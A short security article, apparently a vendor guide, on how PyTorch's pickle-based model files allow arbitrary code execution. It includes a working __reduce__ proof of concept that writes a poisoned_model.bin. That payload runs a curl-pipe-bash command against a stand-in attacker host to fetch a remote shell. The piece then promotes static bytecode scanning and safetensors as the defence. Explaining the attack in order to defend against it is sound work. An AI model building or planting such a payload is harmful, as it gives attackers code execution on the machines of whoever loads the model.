Arbitrary Code Execution via PyTorch Pickle Serialization
The historical reliance on Python's pickle module for serializing PyTorch models (pytorch_model.bin) represents one of the most severe supply chain vulnerabilities in the machine learning ecosystem. Pickle is not a declarative data format like JSON; it is an imperative, stack-based programming language.
When a framework executes torch.load(), it instantiates the Pickle Virtual Machine (PVM) to interpret the bytecode sequence, inherently granting it the ability to execute arbitrary Python functions.
Exploiting the __reduce__ Protocol
The pickle protocol relies on the __reduce__ magic method to define how complex objects should be reconstructed. An attacker can construct a malicious class where __reduce__ returns a callable (such as os.system or subprocess.Popen) alongside a tuple of arguments (the malicious payload).
Payload Construction
import pickle
import os
class MaliciousTensorObject:
def __reduce__(self):
# The PVM will execute this system call upon deserialization
cmd = "curl -s [http://attacker.com/shell.sh](http://attacker.com/shell.sh) | bash"
return (os.system, (cmd,))
# Serialize the payload into a standard PyTorch extension
with open("poisoned_model.bin", "wb") as f:
pickle.dump(MaliciousTensorObject(), f)
Upon downloading and loading this .bin file, the PVM processes the GLOBAL opcode to resolve os.system, followed by the REDUCE opcode which executes the function with the provided shell command, granting the attacker a reverse shell with the privileges of the process running the model.
Mitigation: Static Bytecode Analysis
Standard antivirus (AV) and Yara rules frequently fail to detect these payloads because the bytecode can be heavily obfuscated, and AV engines lack context regarding PVM opcode sequences.
Defending the ML supply chain requires specialized static analysis. Instead of executing the file, security tools must simulate the stack operations of the PVM to observe the intended execution graph. By integrating Veritensor into your artifact registry or CI/CD pipeline, you can automatically decompile and statically analyze legacy .bin files for dangerous imports (os, pty, socket) and block deployment, while enforcing a structural transition to the purely declarative .safetensors format.